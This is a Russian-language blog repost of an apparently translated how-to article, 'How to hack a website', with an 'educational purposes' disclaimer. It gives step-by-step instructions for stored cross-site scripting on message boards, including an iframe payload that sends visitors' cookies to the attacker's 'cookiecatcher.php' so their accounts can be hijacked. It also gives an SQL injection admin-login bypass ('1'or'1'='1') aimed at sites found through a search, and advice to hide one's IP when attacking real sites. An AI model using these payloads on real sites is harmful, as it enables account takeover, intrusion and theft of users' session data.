Главная » 2016 » Январь » 11 » Как взломать веб–сайт
17:09
Как взломать веб–сайт

Как взломать веб–сайт

3 методика:Применение межсайтового скриптингаВыполнение инъекционных атакОснова для успеха

Обратите внимание: эта инструкция приведена исключительно в образовательных целях, чтобы помочь изучить методы взлома в законных целях и понять принцип работы хакеров для защиты своих веб-сайтов. Эта инструкция поможет получить доступ к веб-сайтам с НИЗКИМ уровнем защиты.

Шаги

Метод 1 из 3: Применение межсайтового скриптинга

  1. 1 Найдите уязвимый сайт, на котором можно размещать контент. Хороший пример - доска объявлений. Помните, если сайт хорошо защищен, это не сработает. http://pad3.whstatic.com/images/thumb/2/28/Hack-a-Website-Step-1-preview.jpg/550px-Hack-a-Website-Step-1-preview.jpg http://pad2.whstatic.com/images/thumb/2/28/Hack-a-Website-Step-1-preview.jpg/300px-Hack-a-Website-Step-1-preview.jpg http://d5kh2btv85w9n.cloudfront.net/6/6e/Hack a Website Step 1.360p.mp4
  2. 2 Перейдите к созданию поста. Вам нужно в тело поста вставить специальный код, собирающий данные тех, кто на него кликнет. http://pad2.whstatic.com/images/thumb/0/0d/Hack-a-Website-Step-2-preview.jpg/550px-Hack-a-Website-Step-2-preview.jpg http://pad1.whstatic.com/images/thumb/0/0d/Hack-a-Website-Step-2-preview.jpg/300px-Hack-a-Website-Step-2-preview.jpg http://d5kh2btv85w9n.cloudfront.net/f/f5/Hack a Website Step 2.360p.mp4
    • Вы захотите проверить, отсеивает ли система код. Опубликуйте <script...>alert("test”)</...script> (не забудьте убрать "…”). Если при нажатии на свой пост появляется окно с предупреждением, тогда этот сайт уязвим для атаки.
  3. 3 Создайте и загрузите свой php-скрипт, который будет получать данные. Цель этой атаки - собрать пользовательские данные типа "cookie", хранящие информацию об учетных записях пользователей. Ее можно использовать для входа в их аккаунты на уязвимых веб-сайтах. Вам потребуется php-скрипт, который будет воровать куки вашей цели и перенаправлять их на ваш сайт. Загрузите php-скрипт на веб-сайт, к которому у вас есть доступ и который поддерживает php. Пример кода php-скрипта можно найти в разделе "Примеры". http://pad2.whstatic.com/images/thumb/3/32/Hack-a-Website-Step-3-preview.jpg/550px-Hack-a-Website-Step-3-preview.jpg http://pad2.whstatic.com/images/thumb/3/32/Hack-a-Website-Step-3-preview.jpg/300px-Hack-a-Website-Step-3-preview.jpg http://d5kh2btv85w9n.cloudfront.net/b/be/Hack a Website Step 3.360p.mp4
  4. 4 Опубликуйте JavaScript-код. Введите в тело поста JavaScript-код, который будет воровать куки и отправлять их на ваш сайт. Чтобы сделать пост менее подозрительным и уберечь его от удаления, после кода впишите какой-нибудь текст. http://pad1.whstatic.com/images/thumb/2/28/Hack-a-Website-Step-4-preview.jpg/550px-Hack-a-Website-Step-4-preview.jpg http://pad3.whstatic.com/images/thumb/2/28/Hack-a-Website-Step-4-preview.jpg/300px-Hack-a-Website-Step-4-preview.jpg http://d5kh2btv85w9n.cloudfront.net/4/43/Hack a Website Step 4.360p.mp4
    • Пример кода будет выглядеть следующим образом: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”ВАШURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (удалите ...).
  5. 5 Использование полученных куки. После этого можете использовать сохраненные у вас на веб-сайте данные куки для любых целей. http://pad1.whstatic.com/images/thumb/4/4e/Hack-a-Website-Step-5-preview.jpg/550px-Hack-a-Website-Step-5-preview.jpg http://pad2.whstatic.com/images/thumb/4/4e/Hack-a-Website-Step-5-preview.jpg/300px-Hack-a-Website-Step-5-preview.jpg http://d5kh2btv85w9n.cloudfront.net/4/4f/Hack a Website Step 5.360p.mp4

Метод 2 из 3: Выполнение инъекционных атак

  1. 1 Найдите уязвимый сайт. Вам нужно найти уязвимый сайт с легкодоступным входом в качестве администратора. Попробуйте поискать в Google по запросу admin login.asp. http://pad1.whstatic.com/images/thumb/b/b3/Hack-a-Website-Step-6-preview.jpg/550px-Hack-a-Website-Step-6-preview.jpg http://pad3.whstatic.com/images/thumb/b/b3/Hack-a-Website-Step-6-preview.jpg/300px-Hack-a-Website-Step-6-preview.jpg http://d5kh2btv85w9n.cloudfront.net/6/6a/Hack a Website Step 6.360p.mp4
  2. 2 Вход в качестве администратора. В поле "логин" введите admin, а в качестве пароля используйте одну из нескольких комбинаций. Может быть много разных вариантов, но распространенным параметром является 1’or’1’=’1. http://pad1.whstatic.com/images/thumb/9/98/Hack-a-Website-Step-7-preview.jpg/550px-Hack-a-Website-Step-7-preview.jpg http://pad2.whstatic.com/images/thumb/9/98/Hack-a-Website-Step-7-preview.jpg/300px-Hack-a-Website-Step-7-preview.jpg http://d5kh2btv85w9n.cloudfront.net/d/d8/Hack a Website Step 7.360p.mp4
  3. 3 Не теряйте терпение. Вам потребуется некоторое время для проб и ошибок. http://pad3.whstatic.com/images/thumb/b/b4/Hack-a-Website-Step-8-preview.jpg/550px-Hack-a-Website-Step-8-preview.jpg http://pad2.whstatic.com/images/thumb/b/b4/Hack-a-Website-Step-8-preview.jpg/300px-Hack-a-Website-Step-8-preview.jpg http://d5kh2btv85w9n.cloudfront.net/1/1a/Hack a Website Step 8.360p.mp4
  4. 4 Получите доступ на веб-сайт. В конце концов, у вас должно получиться найти комбинацию, которая позволит зайти на веб-сайт под логином администратора, конечно, если сайт уязвим к атакам. http://pad1.whstatic.com/images/thumb/6/64/Hack-a-Website-Step-9-preview.jpg/550px-Hack-a-Website-Step-9-preview.jpg http://pad1.whstatic.com/images/thumb/6/64/Hack-a-Website-Step-9-preview.jpg/300px-Hack-a-Website-Step-9-preview.jpg http://d5kh2btv85w9n.cloudfront.net/f/f6/Hack a Website Step 9.360p.mp4

Метод 3 из 3: Основа для успеха

  1. 1 Выучите один или несколько языков программирования. Если вы действительно хотите научится взламывать веб-сайты, вам нужно понять принцип работы компьютера и других технологий. Изучите такие языки программирования, как Python или SQL, они позволят вам лучше владеть компьютером и найти слабые места систем. http://pad2.whstatic.com/images/thumb/e/eb/Hack-a-Website-Step-10-preview.jpg/550px-Hack-a-Website-Step-10-preview.jpg http://pad2.whstatic.com/images/thumb/e/eb/Hack-a-Website-Step-10-preview.jpg/300px-Hack-a-Website-Step-10-preview.jpg http://d5kh2btv85w9n.cloudfront.net/c/c7/Hack a Website Step 10.360p.mp4
  2. 2 Изучите язык HTML на базовом уровне. Чтобы взламывать веб-сайты, вам нужно иметь четкое представление о языках html и javascript. Это требует немало времени, но в интернете достаточно бесплатных способов для изучения, поэтому главное - желание, а возможности всегда найдутся. http://pad2.whstatic.com/images/thumb/a/ad/Hack-a-Website-Step-11-preview.jpg/550px-Hack-a-Website-Step-11-preview.jpg http://pad2.whstatic.com/images/thumb/a/ad/Hack-a-Website-Step-11-preview.jpg/300px-Hack-a-Website-Step-11-preview.jpg http://d5kh2btv85w9n.cloudfront.net/1/10/Hack a Website Step 11.360p.mp4
  3. 3 Проконсультируйтесь с «белыми» хакерами. "Белые" хакеры - это те, кто использует свои знания на благо добра, выявляя уязвимости систем безопасности и делая этим Интернет лучшим местом для всех. Если вы хотите научиться взлому, чтобы использовать его на благо добра или защитить ваш собственный веб-сайт, возможно, вам понадобится консультация "белых" хакеров. http://pad3.whstatic.com/images/thumb/7/77/Hack-a-Website-Step-12-preview.jpg/550px-Hack-a-Website-Step-12-preview.jpg http://pad1.whstatic.com/images/thumb/7/77/Hack-a-Website-Step-12-preview.jpg/300px-Hack-a-Website-Step-12-preview.jpg http://d5kh2btv85w9n.cloudfront.net/4/4b/Hack a Website Step 12.360p.mp4
  4. 4 Исследуйте взлом. Если вы хотите стать хакером или защитить себя, вам предстоит во многом разобраться. На данный момент существует множество дыр в безопасности веб-сайтов и их список пополняется с каждым днем, поэтому вы постоянно должны обучаться. http://pad2.whstatic.com/images/thumb/9/99/Hack-a-Website-Step-13-preview.jpg/550px-Hack-a-Website-Step-13-preview.jpg http://pad1.whstatic.com/images/thumb/9/99/Hack-a-Website-Step-13-preview.jpg/300px-Hack-a-Website-Step-13-preview.jpg http://d5kh2btv85w9n.cloudfront.net/1/18/Hack a Website Step 13.360p.mp4
  5. 5 Будьте в курсе. Поскольку список возможных путей взлома постоянно меняется, вы должны идти в ногу со временем. Если сейчас вы защищены от некоторых типов атак, это не значит, что вы будете в безопасности завтра! http://pad2.whstatic.com/images/thumb/8/8c/Hack-a-Website-Step-14-preview.jpg/550px-Hack-a-Website-Step-14-preview.jpg http://pad3.whstatic.com/images/thumb/8/8c/Hack-a-Website-Step-14-preview.jpg/300px-Hack-a-Website-Step-14-preview.jpg http://d5kh2btv85w9n.cloudfront.net/7/78/Hack a Website Step 14.360p.mp4

Советы

  • Почитайте хакерские форумы, чтобы получить много полезных советов.

Предупреждения

  • Если вы решили испробовать свои хакерские навыки в реальном мире, не забудьте скрыть свой IP-адрес с помощью программного обеспечения, доступного в сети Интернет.
  • Прочитав эту статью, вы не станете хакером немедленно. Совершенствуйте свои навыки и практикуйтесь, практикуйтесь и еще раз практикуйтесь.
  • Помните, деятельность хакеров является незаконной. Если вас поймают, это ваша вина.
Категория: Вопросы и ответы | Просмотров: 468 | | Рейтинг: 0.0/0
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]